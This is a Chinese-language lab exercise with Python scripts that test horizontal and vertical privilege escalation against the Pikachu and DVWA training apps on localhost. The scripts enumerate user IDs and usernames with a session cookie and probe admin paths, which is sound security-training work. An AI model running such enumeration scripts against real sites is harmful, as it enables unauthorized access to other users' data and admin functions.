## 一、核心目标
1.  实现批量用户ID测试水平越权的基础逻辑
2.  编写带越权判断逻辑的请求脚本，验证漏洞存在
3.  使用requests库探测垂直越权，扫描管理员后台路径

---

## 二、代码实现与逐行解析

### 习题1：批量用户ID测试水平越权
```python
# 模拟多个目标用户ID，批量测试水平越权
user_ids = [1, 2, 3, 5, 8]
url_template = "http://localhost/pikachu/vul/overpermission/op1/op1.php?userid={}"

for uid in user_ids:
    url = url_template.format(uid)
    print(f"测试: {url}")

### 习题2：带越权判断逻辑的请求脚本
import requests
url="http://127.0.0.1:9999/pikachu/vul/overpermission/op1/op1_mem.php"
headers={"cookie":"PHPSESSID=kpvnp4ain20og4i55dahh08p92"}
current_user="kobe"
usernames=["vince","lucy","lili","allen","kevin"]
for username in usernames:
    params={"username":username}
    resp=requests.get(url,headers=headers,params=params)
    if username !=current_user and "欢迎来到个人信息中心" in resp.text:
        print(f"水平越权漏洞存在!可访问其他用户{username}的资料")
    else:
        print(f"访问{username}的状态码:{resp.status_code}")

### 习题3：垂直越权探测（普通用户访管理员页面
import requests
admin_urls=[
    "http://127.0.0.1:9999/dvwa/admin/",
    "http://127.0.0.1:9999/pikachu/vul/overpermission/op2/op2_admin.php"
]
headers={
    "cookie":"PHPSESSID=qroboe16vr1lpiifibh1gnc3m3;security=low"
}
for url in admin_urls:
    resp=requests.get(url,headers=headers)
    if resp.status_code == 200 and "manage" in resp.text:
        print(f"垂直越权成功:{url}")
    else:
        print(f"无法访问:{url}")
